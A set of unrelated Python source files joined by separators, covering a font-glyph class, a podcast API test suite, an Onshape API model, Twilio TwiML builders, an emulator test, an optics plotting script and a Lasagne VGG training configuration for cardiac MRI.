pointPen = self.getPointPen()
glyph.drawPoints(pointPen)
self.lib = deepcopy(glyph.lib)
# -----
# Clear
# -----
def clear(self):
"""
Clear all contours, components, anchors and guidelines from the glyph.
This posts a *Glyph.Changed* notification.
"""
self.holdNotifications(note="Requested by Glyph.clear.")
self.clearContours()
self.clearComponents()
self.clearAnchors()
self.clearGuidelines()
self.clearImage()
self.releaseHeldNotifications()
# ----
# Move
# ----
def move(self, values):
"""
Move all contours, components and anchors in the glyph
by **(x, y)**.
This posts a *Glyph.Changed* notification.
"""
(x, y) = values
for contour in self:
contour.move((x, y))
for component in self._components:
component.move((x, y))
for anchor in self._anchors:
anchor.move((x, y))
# ------------
# Point Inside
# ------------
def pointInside(self, coordinates, evenOdd=False):
"""
Returns a boolean indicating if **(x, y)** is in the
"black" area of the glyph.
"""
(x, y) = coordinates
from fontTools.pens.pointInsidePen import PointInsidePen
pen = PointInsidePen(glyphSet=None, testPoint=(x, y), evenOdd=evenOdd)
self.draw(pen)
return pen.getResult()
# ----------------------
# Notification Callbacks
# ----------------------
def endSelfNotificationObservation(self):
if self.dispatcher is None:
return
if self._contours:
for contour in self:
self.endSelfContourNotificationObservation(contour)
for component in self.components:
self.endSelfComponentNotificationObservation(component)
for anchor in self.anchors:
self.endSelfAnchorNotificationObservation(anchor)
for guideline in self.guidelines:
self.endSelfGuidelineNotificationObservation(guideline)
self.endSelfLibNotificationObservation()
self.endSelfImageNotificationObservation()
super(Glyph, self).endSelfNotificationObservation()
self._font = None
self._layerSet = None
self._layer = None
def _imageDataChanged(self, notification):
self.postNotification(notification="Glyph.ImageChanged")
self.postNotification(notification=self.changeNotificationName)
def _imageChanged(self, notification):
self.postNotification(notification="Glyph.ImageChanged")
self.dirty = True
def _contourChanged(self, notification):
self.postNotification(notification="Glyph.ContoursChanged")
self.dirty = True
def _componentChanged(self, notification):
self.postNotification(notification="Glyph.ComponentsChanged")
self.dirty = True
def _componentBaseGlyphDataChanged(self, notification):
self.postNotification(notification="Glyph.ComponentsChanged")
self.postNotification(notification=self.changeNotificationName)
def _anchorChanged(self, notification):
self.postNotification(notification="Glyph.AnchorsChanged")
self.dirty = True
def _guidelineChanged(self, notification):
self.postNotification(notification="Glyph.GuidelinesChanged")
self.dirty = True
def _libContentChanged(self, notification):
self.postNotification(notification="Glyph.LibChanged")
self.dirty = True
# -----------------------------
# Serialization/Deserialization
# -----------------------------
def getDataForSerialization(self, **kwargs):
from functools import partial
simple_get = partial(getattr, self)
serialize = lambda item: item.getDataForSerialization()
serialized_get = lambda key: serialize(simple_get(key))
serialized_list_get = lambda key: [serialize(item) for item in simple_get(key)]
getters = [
('name', simple_get),
('unicodes', simple_get),
('width', simple_get),
('height', simple_get),
('note', simple_get),
('components', serialized_list_get),
('anchors', serialized_list_get),
('guidelines', serialized_list_get),
('image', serialized_get),
('lib', serialized_get)
]
if self._shallowLoadedContours is not None:
getters.append(('_shallowLoadedContours', simple_get))
else:
getters.append(('_contours', serialized_list_get))
return self._serialize(getters, **kwargs)
def setDataFromSerialization(self, data):
from functools import partial
set_attr = partial(setattr, self) # key, data
def set_each(setter, drop_key=False):
_setter = lambda k, v: setter(v) if drop_key else setter
def wrapper(key, data):
for d in data:
_setter(key, d)
return wrapper
def single_init(factory, data):
item = factory()
item.setDataFromSerialization(data)
return item
def list_init(factory, data):
return [single_init(factory, childData) for childData in data]
def init_set(init, factory, setter):
def wrapper(key, data):
setter(key, init(factory, data))
return wrapper
# Clear all contours, components, anchors and guidelines from the glyph.
self.clear()
setters = (
('name', set_attr),
('unicodes', set_attr),
('width', set_attr),
('height', set_attr),
('note', set_attr),
('lib', set_attr),
('_shallowLoadedContours', set_attr),
('_contours', init_set(list_init, self.instantiateContour, set_each(self.appendContour, True))),
('components', init_set(list_init, self.instantiateComponent, set_each(self.appendComponent, True))),
('guidelines', init_set(list_init, self.instantiateGuideline, set_attr)),
('anchors', init_set(list_init, self.instantiateAnchor, set_attr)),
('image', init_set(single_init, self.instantiateImage, set_attr))
)
for key, setter in setters:
if key not in data:
continue
setter(key, data[key])
if __name__ == "__main__":
import doctest
doctest.testmod()
|
import os
import unittest
import pocketcasts
USERNAME = os.environ.get('POCKETCAST_USER')
PASSWORD = os.environ.get('POCKETCAST_PASSWORD')
class PocketcastTest(unittest.TestCase):
pocket = pocketcasts.Pocketcasts(USERNAME, PASSWORD)
def test_invalid_method(self):
self.assertRaises(Exception, self.pocket._make_req, 'test', method='INVALID')
def test_invalid_login(self):
self.assertRaises(Exception, pocketcasts.Pocketcasts, 'test', 'INVALID')
def test_get_top_charts(self):
response = self.pocket.get_top_charts()
def test_get_featured(self):
response = self.pocket.get_featured()
def test_get_trending(self):
response = self.pocket.get_trending()
def test_get_podcast(self):
response = self.pocket.get_podcast('12012c20-0423-012e-f9a0-00163e1b201c')
def test_get_podcast_episodes(self):
response = self.pocket.get_podcast_episodes(self.pocket.get_trending()[0])
def test_get_episode(self):
pod = self.pocket.get_podcast("12012c20-0423-012e-f9a0-00163e1b201c")
self.pocket.get_episode(pod, "7b28c700-d4f1-0134-ebdd-4114446340cb")
def test_get_starred(self):
self.pocket.get_starred()
def test_search_podcasts(self):
self.pocket.search_podcasts('test')
def test_subscribe_functions(self):
pod = self.pocket.get_podcast("da9bb800-e230-0132-0bd1-059c869cc4eb")
pod.subscribed = True
pod.subscribed = False
def test_get_episode_notes(self):
response = self.pocket.get_episode_notes('a35748e0-bb4d-0134-10a8-25324e2a541d')
def test_get_subscribed_podcasts(self):
response = self.pocket.get_subscribed_podcasts()
def test_get_new_releases(self):
response = self.pocket.get_new_releases()
def test_get_in_progress(self):
response = self.pocket.get_in_progress()
def test_update_playing_status(self):
pod = self.pocket.get_podcast("12012c20-0423-012e-f9a0-00163e1b201c")
epi = self.pocket.get_podcast_episodes(pod)[-1]
epi.playing_status = 3
def test_invalid_update_playing_status(self):
pod = self.pocket.get_podcast("12012c20-0423-012e-f9a0-00163e1b201c")
epi = self.pocket.get_podcast_episodes(pod)[-1]
with self.assertRaises(Exception) as context:
epi.playing_status = 'invalid'
self.assertTrue('Sorry your update failed.' in context.exception)
def test_update_played_position(self):
pod = self.pocket.get_podcast("12012c20-0423-012e-f9a0-00163e1b201c")
epi = self.pocket.get_podcast_episodes(pod)[-1]
epi.played_up_to = 2
def test_invalid_played_position(self):
pod = self.pocket.get_podcast("12012c20-0423-012e-f9a0-00163e1b201c")
epi = self.pocket.get_podcast_episodes(pod)[-1]
with self.assertRaises(Exception) as context:
epi.played_up_to = 'invalid'
self.assertTrue('Sorry your update failed.' in context.exception)
def test_update_starred(self):
pod = self.pocket.get_podcast("12012c20-0423-012e-f9a0-00163e1b201c")
epi = self.pocket.get_podcast_episodes(pod)[-1]
epi.starred = True
epi.starred = False
if __name__ == '__main__':
unittest.main()
|
"""
Onshape REST API
The Onshape REST API consumed by all clients. # noqa: E501
The version of the OpenAPI document: 1.113
Contact: api-support@onshape.zendesk.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
try:
from onshape_client.oas.models import bt_color_info
except ImportError:
bt_color_info = sys.modules["onshape_client.oas.models.bt_color_info"]
class BTPartAppearanceInfo(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {}
validations = {}
additional_properties_type = None
@staticmethod
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self, this ensures that we don't create a cyclic import
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"color": (bt_color_info.BTColorInfo,), # noqa: E501
"is_generated": (bool,), # noqa: E501
"opacity": (int,), # noqa: E501
}
@staticmethod
def discriminator():
return None
attribute_map = {
"color": "color", # noqa: E501
"is_generated": "isGenerated", # noqa: E501
"opacity": "opacity", # noqa: E501
}
@staticmethod
def _composed_schemas():
return None
required_properties = set(
[
"_data_store",
"_check_type",
"_from_server",
"_path_to_item",
"_configuration",
]
)
def __init__(
self,
_check_type=True,
_from_server=False,
_path_to_item=(),
_configuration=None,
**kwargs
): # noqa: E501
"""bt_part_appearance_info.BTPartAppearanceInfo - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
color (bt_color_info.BTColorInfo): [optional] # noqa: E501
is_generated (bool): [optional] # noqa: E501
opacity (int): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
for var_name, var_value in six.iteritems(kwargs):
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)
|
attendees = ['Alison', 'Carolyn', 'Hannah']
for person in attendees: #for "name of variable that we're going to use as we go through this list" in "this list"
print person
#person = 'Alison', print person
#person = 'Carolyn', print person
for cow in range(5):
print cow
print '\n\n\n\n\n'
days_of_week = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
for day in days_of_week:
print day
for week in range(1,5): #[1,2,3,4]
print "Week {0}".format(week)
print '\n\n\n\n\n'
months = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']
print '\n\n\n\n\n'
for index, day in enumerate(days_of_week): #or, for dog, day in ...
print "Day {0}: {1}".format(index + 1, day)
|
import Shadow
from matplotlib import pylab as plt
import numpy
ymin = -100.0
ymax = 100.0
ypoints = 101
beam = in_object_1._beam
tkt = Shadow.ShadowTools.ray_prop(beam,nolost=1,ymin=ymin,ymax=ymax,ypoints=ypoints,xbins=61,zbins=61)
f1 = plt.figure(1)
plt.plot(tkt["y"],2.35*tkt["x_sd"],label="x (tangential)")
plt.plot(tkt["y"],2.35*tkt["x_wsd"],label="x weighted (tangential)")
plt.plot(tkt["y"],2.35*tkt["z_sd"],label="z (sagittal)")
plt.plot(tkt["y"],2.35*tkt["z_wsd"],label="z weighted (sagittal)")
plt.legend()
plt.title("ray_prop")
plt.xlabel("Y [cm]")
plt.ylabel("2.35*SD [cm]")
f2 = plt.figure(2)
if tkt["x_fwhm"] is None:
pass
else:
plt.plot(tkt["y"],tkt["x_fwhm"],label="x (histo)")
plt.plot(tkt["y"],tkt["x_wfwhm"],label="x (weighted histo)")
if tkt["z_fwhm"] is None:
pass
else:
plt.plot(tkt["y"],tkt["z_fwhm"],label="z (histo)")
plt.plot(tkt["y"],tkt["z_wfwhm"],label="z (weighted histo)")
plt.legend()
plt.title("ray_prop (from histograms)")
plt.xlabel("Y [cm]")
plt.ylabel("FWHM [cm]")
plt.show()
|
import pytari2600.memory.cartridge as cartridge
import unittest
import pkg_resources
class TestCartridge(unittest.TestCase):
def test_cartridge(self):
cart = cartridge.GenericCartridge(pkg_resources.resource_filename(__name__, 'dummy_rom.bin'), 4, 0x1000, 0xFF9, 0x0)
# Write should do nothing
cart.write(0,7)
self.assertEqual(cart.read(0), 0)
self.assertEqual(cart.read(3), 3)
self.assertEqual(cart.read(2048+2), 2)
def test_ram_cartridge(self):
cart = cartridge.GenericCartridge(pkg_resources.resource_filename(__name__, 'dummy_rom.bin'), 4, 0x1000, 0xFF9, 0x080)
# Write should go to ram.
cart.write(0,7)
self.assertEqual(cart.read(0x80), 7)
cart.write(0,31)
self.assertEqual(cart.read(0x80), 31)
if __name__ == '__main__':
unittest.main()
|
"""
Make sure to check out the TwiML overview and tutorial
"""
import xml.etree.ElementTree as ET
class TwimlException(Exception):
pass
class Verb(object):
"""Twilio basic verb object.
"""
GET = "GET"
POST = "POST"
nestables = None
def __init__(self, **kwargs):
self.name = self.__class__.__name__
self.body = None
self.verbs = []
self.attrs = {}
if kwargs.get("waitMethod", "GET") not in ["GET", "POST"]:
raise TwimlException("Invalid waitMethod parameter, "
"must be 'GET' or 'POST'")
if kwargs.get("method", "GET") not in ["GET", "POST"]:
raise TwimlException("Invalid method parameter, "
"must be 'GET' or 'POST'")
for k, v in kwargs.items():
if k == "sender":
k = "from"
if v is not None:
self.attrs[k] = v
def __str__(self):
return self.toxml()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
return False
def toxml(self, xml_declaration=True):
"""
Return the contents of this verb as an XML string
:param bool xml_declaration: Include the XML declaration. Defaults to
True
"""
xml = ET.tostring(self.xml()).encode("utf-8")
if xml_declaration:
return u'<?xml version="1.0" encoding="UTF-8"?>' + xml
else:
return xml
def xml(self):
el = ET.Element(self.name)
keys = self.attrs.keys()
keys.sort()
for a in keys:
value = self.attrs[a]
if isinstance(value, bool):
el.set(a, str(value).lower())
else:
el.set(a, str(value))
if self.body:
el.text = self.body
for verb in self.verbs:
el.append(verb.xml())
return el
def append(self, verb):
if not self.nestables or verb.name not in self.nestables:
raise TwimlException("%s is not nestable inside %s" % \
(verb.name, self.name))
self.verbs.append(verb)
return verb
class Response(Verb):
"""Twilio response object."""
nestables = [
'Say',
'Play',
'Gather',
'Record',
'Dial',
'Redirect',
'Pause',
'Hangup',
'Reject',
'Sms',
]
def __init__(self, **kwargs):
"""Version: Twilio API version e.g. 2008-08-01 """
super(Response, self).__init__(**kwargs)
def say(self, text, **kwargs):
"""Return a newly created :class:`Say` verb, nested inside this
:class:`Response` """
return self.append(Say(text, **kwargs))
def play(self, url, **kwargs):
"""Return a newly created :class:`Play` verb, nested inside this
:class:`Response` """
return self.append(Play(url, **kwargs))
def pause(self, **kwargs):
"""Return a newly created :class:`Pause` verb, nested inside this
:class:`Response` """
return self.append(Pause(**kwargs))
def redirect(self, url=None, **kwargs):
"""Return a newly created :class:`Redirect` verb, nested inside this
:class:`Response` """
return self.append(Redirect(url, **kwargs))
def hangup(self, **kwargs):
"""Return a newly created :class:`Hangup` verb, nested inside this
:class:`Response` """
return self.append(Hangup(**kwargs))
def reject(self, reason=None, **kwargs):
"""Return a newly created :class:`Hangup` verb, nested inside this
:class:`Response` """
return self.append(Reject(reason=reason, **kwargs))
def gather(self, **kwargs):
"""Return a newly created :class:`Gather` verb, nested inside this
:class:`Response` """
return self.append(Gather(**kwargs))
def dial(self, number=None, **kwargs):
"""Return a newly created :class:`Dial` verb, nested inside this
:class:`Response` """
return self.append(Dial(number, **kwargs))
def record(self, **kwargs):
"""Return a newly created :class:`Record` verb, nested inside this
:class:`Response` """
return self.append(Record(**kwargs))
def sms(self, msg, **kwargs):
"""Return a newly created :class:`Sms` verb, nested inside this
:class:`Response` """
return self.append(Sms(msg, **kwargs))
# All add* methods are deprecated
def addSay(self, *args, **kwargs):
return self.say(*args, **kwargs)
def addPlay(self, *args, **kwargs):
return self.play(*args, **kwargs)
def addPause(self, *args, **kwargs):
return self.pause(*args, **kwargs)
def addRedirect(self, *args, **kwargs):
return self.redirect(*args, **kwargs)
def addHangup(self, *args, **kwargs):
return self.hangup(*args, **kwargs)
def addReject(self, *args, **kwargs):
return self.reject(*args, **kwargs)
def addGather(self, *args, **kwargs):
return self.gather(*args, **kwargs)
def addDial(self, *args, **kwargs):
return self.dial(*args, **kwargs)
def addRecord(self, *args, **kwargs):
return self.record(*args, **kwargs)
def addSms(self, *args, **kwargs):
return self.sms(*args, **kwargs)
class Say(Verb):
"""The :class:`Say` verb converts text to speech that is read back to the
caller.
:param voice: allows you to choose a male or female voice to read text
back.
:param language: allows you pick a voice with a specific language's accent
and pronunciations. Twilio currently supports languages
'en' (English), 'es' (Spanish), 'fr' (French), and 'de'
(German), 'en-gb' (English Great Britain").
:param loop: specifies how many times you'd like the text repeated.
Specifying '0' will cause the the :class:`Say` verb to loop
until the call is hung up.
"""
MAN = 'man'
WOMAN = 'woman'
ENGLISH = 'en'
BRITISH = 'en-gb'
SPANISH = 'es'
FRENCH = 'fr'
GERMAN = 'de'
def __init__(self, text, **kwargs):
super(Say, self).__init__(**kwargs)
self.body = text
class Play(Verb):
"""Play an audio file at a URL
:param url: point to af audio file. The MIME type on the file must be set
correctly.
:param loop: specifies how many times you'd like the text repeated.
Specifying '0' will cause the the :class:`Say` verb to loop
until the call is hung up. Defaults to 1.
"""
def __init__(self, url, **kwargs):
super(Play, self).__init__(**kwargs)
self.body = url
class Pause(Verb):
"""Pause the call
:param length: specifies how many seconds Twilio will wait silently before
continuing on.
"""
class Redirect(Verb):
"""Redirect call flow to another URL
:param url: specifies the url which Twilio should query to retrieve new
TwiML. The default is the current url
:param method: specifies the HTTP method to use when retrieving the url
"""
GET = 'GET'
POST = 'POST'
def __init__(self, url="", **kwargs):
super(Redirect, self).__init__(**kwargs)
self.body = url
class Hangup(Verb):
"""Hangup the call
"""
class Reject(Verb):
"""Hangup the call
:param reason: not sure
"""
class Gather(Verb):
"""Gather digits from the caller's keypad
:param action: URL to which the digits entered will be sent
:param method: submit to 'action' url using GET or POST
:param numDigits: how many digits to gather before returning
:param timeout: wait for this many seconds before returning
:param finishOnKey: key that triggers the end of caller input
"""
GET = 'GET'
POST = 'POST'
nestables = ['Say', 'Play', 'Pause']
def __init__(self, **kwargs):
super(Gather, self).__init__(**kwargs)
def say(self, text, **kwargs):
return self.append(Say(text, **kwargs))
def play(self, url, **kwargs):
return self.append(Play(url, **kwargs))
def pause(self, **kwargs):
return self.append(Pause(**kwargs))
def addSay(self, *args, **kwargs):
return self.say(*args, **kwargs)
def addPlay(self, *args, **kwargs):
return self.play(*args, **kwargs)
def addPause(self, *args, **kwargs):
return self.pause(*args, **kwargs)
class Number(Verb):
"""Specify phone number in a nested Dial element.
:param number: phone number to dial
:param sendDigits: key to press after connecting to the number
"""
def __init__(self, number, **kwargs):
super(Number, self).__init__(**kwargs)
self.body = number
class Client(Verb):
"""Specify a client name to call in a nested Dial element.
:param name: Client name to connect to
"""
def __init__(self, name, **kwargs):
super(Client, self).__init__(**kwargs)
self.body = name
class Sms(Verb):
""" Send a Sms Message to a phone number
:param to: whom to send message to
:param sender: whom to send message from.
:param action: url to request after the message is queued
:param method: submit to 'action' url using GET or POST
:param statusCallback: url to hit when the message is actually sent
"""
GET = 'GET'
POST = 'POST'
def __init__(self, msg, **kwargs):
super(Sms, self).__init__(**kwargs)
self.body = msg
class Conference(Verb):
"""Specify conference in a nested Dial element.
:param name: friendly name of conference
:param bool muted: keep this participant muted
:param bool beep: play a beep when this participant enters/leaves
:param bool startConferenceOnEnter: start conf when this participants joins
:param bool endConferenceOnExit: end conf when this participants leaves
:param waitUrl: TwiML url that executes before conference starts
:param waitMethod: HTTP method for waitUrl GET/POST
"""
GET = 'GET'
POST = 'POST'
def __init__(self, name, **kwargs):
super(Conference, self).__init__(**kwargs)
self.body = name
class Dial(Verb):
"""Dial another phone number and connect it to this call
:param action: submit the result of the dial to this URL
:param method: submit to 'action' url using GET or POST
:param int timeout: The number of seconds to waits for the called
party to answer the call
:param bool hangupOnStar: Allow the calling party to hang up on the
called party by pressing the '*' key
:param int timeLimit: The maximum duration of the Call in seconds
:param callerId: The caller ID that will appear to the called party
:param bool record: Record both legs of a call within this <Dial>
"""
GET = 'GET'
POST = 'POST'
nestables = ['Number', 'Conference', 'Client']
def __init__(self, number=None, **kwargs):
super(Dial, self).__init__(**kwargs)
if number and len(number.split(',')) > 1:
for n in number.split(','):
self.append(Number(n.strip()))
else:
self.body = number
def client(self, name, **kwargs):
return self.append(Client(name, **kwargs))
def number(self, number, **kwargs):
return self.append(Number(number, **kwargs))
def conference(self, name, **kwargs):
return self.append(Conference(name, **kwargs))
def addNumber(self, *args, **kwargs):
return self.number(*args, **kwargs)
def addConference(self, *args, **kwargs):
return self.conference(*args, **kwargs)
class Record(Verb):
"""Record audio from caller
:param action: submit the result of the dial to this URL
:param method: submit to 'action' url using GET or POST
:param maxLength: maximum number of seconds to record
:param timeout: seconds of silence before considering the recording done
"""
GET = 'GET'
POST = 'POST'
|
"""
.. module:: __main__
:platform: linux
:synopsis: Special main entry point.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/28/15
"""
import sys
from planet_alignment.app.app_factory import AppFactory
from planet_alignment.cmd.cmd_parser import CommandParser
def main(argv=None):
"""The main function"""
if argv is None:
argv = sys.argv[1:]
cmd_args = CommandParser().parse(argv)
app = AppFactory(cmd_args).create()
results = app.run()
if results:
app.print_results(results)
if __name__ == "__main__":
sys.exit(main())
|
"""Single slice vgg with normalised scale.
"""
import functools
import lasagne as nn
import numpy as np
import theano
import theano.tensor as T
import data_loader
import deep_learning_layers
import image_transform
import layers
import preprocess
import postprocess
import objectives
import theano_printer
import updates
import utils
rng = np.random
take_a_dump = False # dump a lot of data in a pkl-dump file. (for debugging)
dump_network_loaded_data = False # dump the outputs from the dataloader (for debugging)
caching = None
validate_every = 10
validate_train_set = True
save_every = 10
restart_from_save = False
dump_network_loaded_data = False
batch_size = 32
sunny_batch_size = 4
batches_per_chunk = 16
AV_SLICE_PER_PAT = 11
num_epochs_train = 80 * AV_SLICE_PER_PAT
base_lr = .0001
learning_rate_schedule = {
0: base_lr,
9*num_epochs_train/10: base_lr/10,
}
momentum = 0.9
build_updates = updates.build_adam_updates
cleaning_processes = [
preprocess.set_upside_up,]
cleaning_processes_post = [
functools.partial(preprocess.normalize_contrast_zmuv, z=2)]
augmentation_params = {
"rotation": (-180, 180),
"shear": (0, 0),
"translation": (-8, 8),
"flip_vert": (0, 1),
"roll_time": (0, 0),
"flip_time": (0, 0),
"zoom_x": (.75, 1.25),
"zoom_y": (.75, 1.25),
"change_brightness": (-0.3, 0.3),
}
augmentation_params_test = {
"rotation": (-180, 180),
"shear": (0, 0),
"translation": (-8, 8),
"flip_vert": (0, 1),
"roll_time": (0, 0),
"flip_time": (0, 0),
"zoom_x": (.80, 1.20),
"zoom_y": (.80, 1.20),
"change_brightness": (-0.2, 0.2),
}
use_hough_roi = True
preprocess_train = functools.partial( # normscale_resize_and_augment has a bug
preprocess.preprocess_normscale,
normscale_resize_and_augment_function=functools.partial(
image_transform.normscale_resize_and_augment_2,
normalised_patch_size=(80,80)))
preprocess_validation = functools.partial(preprocess_train, augment=False)
preprocess_test = preprocess_train
sunny_preprocess_train = preprocess.sunny_preprocess_with_augmentation
sunny_preprocess_validation = preprocess.sunny_preprocess_validation
sunny_preprocess_test = preprocess.sunny_preprocess_validation
create_train_gen = data_loader.generate_train_batch
create_eval_valid_gen = functools.partial(data_loader.generate_validation_batch, set="validation")
create_eval_train_gen = functools.partial(data_loader.generate_validation_batch, set="train")
create_test_gen = functools.partial(data_loader.generate_test_batch, set=["validation", "test"])
image_size = 64
data_sizes = {
"sliced:data:singleslice:difference:middle": (batch_size, 29, image_size, image_size), # 30 time steps, 30 mri_slices, 100 px wide, 100 px high,
"sliced:data:singleslice:difference": (batch_size, 29, image_size, image_size), # 30 time steps, 30 mri_slices, 100 px wide, 100 px high,
"sliced:data:singleslice": (batch_size, 30, image_size, image_size), # 30 time steps, 30 mri_slices, 100 px wide, 100 px high,
"sliced:data:ax": (batch_size, 30, 15, image_size, image_size), # 30 time steps, 30 mri_slices, 100 px wide, 100 px high,
"sliced:data:shape": (batch_size, 2,),
"sunny": (sunny_batch_size, 1, image_size, image_size)
# TBC with the metadata
}
l2_weight = 0.000
l2_weight_out = 0.000
def build_objective(interface_layers):
# l2 regu on certain layers
l2_penalty = nn.regularization.regularize_layer_params_weighted(
interface_layers["regularizable"], nn.regularization.l2)
# build objective
return objectives.KaggleObjective(interface_layers["outputs"], penalty=l2_penalty)
postprocess = postprocess.postprocess
test_time_augmentations = 100 * AV_SLICE_PER_PAT # More augmentations since a we only use single slices
tta_average_method = lambda x: np.cumsum(utils.norm_geometric_average(utils.cdf_to_pdf(x)))
def lb_softplus(lb):
return lambda x: nn.nonlinearities.softplus(x) + lb
def build_model(input_layer=None):
#################
# Regular model #
#################
input_size = data_sizes["sliced:data:singleslice"]
if input_layer:
l0 = input_layer
else:
l0 = nn.layers.InputLayer(input_size)
l1a = nn.layers.dnn.Conv2DDNNLayer(l0, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=64, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l1b = nn.layers.dnn.Conv2DDNNLayer(l1a, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=64, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l1 = nn.layers.dnn.MaxPool2DDNNLayer(l1b, pool_size=(2,2), stride=(2,2))
l2a = nn.layers.dnn.Conv2DDNNLayer(l1, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=128, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l2b = nn.layers.dnn.Conv2DDNNLayer(l2a, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=128, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l2 = nn.layers.dnn.MaxPool2DDNNLayer(l2b, pool_size=(2,2), stride=(2,2))
l3a = nn.layers.dnn.Conv2DDNNLayer(l2, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=256, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l3b = nn.layers.dnn.Conv2DDNNLayer(l3a, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=256, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l3c = nn.layers.dnn.Conv2DDNNLayer(l3b, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=256, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l3 = nn.layers.dnn.MaxPool2DDNNLayer(l3c, pool_size=(2,2), stride=(2,2))
l4a = nn.layers.dnn.Conv2DDNNLayer(l3, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=512, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l4b = nn.layers.dnn.Conv2DDNNLayer(l4a, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=512, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l4c = nn.layers.dnn.Conv2DDNNLayer(l4b, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=512, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l4 = nn.layers.dnn.MaxPool2DDNNLayer(l4c, pool_size=(2,2), stride=(2,2))
l5a = nn.layers.dnn.Conv2DDNNLayer(l4, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=512, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l5b = nn.layers.dnn.Conv2DDNNLayer(l5a, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=512, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l5c = nn.layers.dnn.Conv2DDNNLayer(l5b, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=512, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l5 = nn.layers.dnn.MaxPool2DDNNLayer(l5c, pool_size=(2,2), stride=(2,2))
# Systole Dense layers
ldsys1 = nn.layers.DenseLayer(l5, num_units=512, W=nn.init.Orthogonal("relu"), b=nn.init.Constant(0.1), nonlinearity=nn.nonlinearities.rectify)
ldsys1drop = nn.layers.dropout(ldsys1, p=0.5)
ldsys2 = nn.layers.DenseLayer(ldsys1drop, num_units=512, W=nn.init.Orthogonal("relu"),b=nn.init.Constant(0.1), nonlinearity=nn.nonlinearities.rectify)
ldsys2drop = nn.layers.dropout(ldsys2, p=0.5)
ldsys3mu = nn.layers.DenseLayer(ldsys2drop, num_units=1, W=nn.init.Orthogonal("relu"), b=nn.init.Constant(200.0), nonlinearity=None)
ldsys3sigma = nn.layers.DenseLayer(ldsys2drop, num_units=1, W=nn.init.Orthogonal("relu"), b=nn.init.Constant(50.0), nonlinearity=lb_softplus(3))
ldsys3musigma = nn.layers.ConcatLayer([ldsys3mu, ldsys3sigma], axis=1)
l_systole = layers.MuSigmaErfLayer(ldsys3musigma)
# Diastole Dense layers
lddia1 = nn.layers.DenseLayer(l5, num_units=512, W=nn.init.Orthogonal("relu"), b=nn.init.Constant(0.1), nonlinearity=nn.nonlinearities.rectify)
lddia1drop = nn.layers.dropout(lddia1, p=0.5)
lddia2 = nn.layers.DenseLayer(lddia1drop, num_units=512, W=nn.init.Orthogonal("relu"),b=nn.init.Constant(0.1), nonlinearity=nn.nonlinearities.rectify)
lddia2drop = nn.layers.dropout(lddia2, p=0.5)
lddia3mu = nn.layers.DenseLayer(lddia2drop, num_units=1, W=nn.init.Orthogonal("relu"), b=nn.init.Constant(200.0), nonlinearity=None)
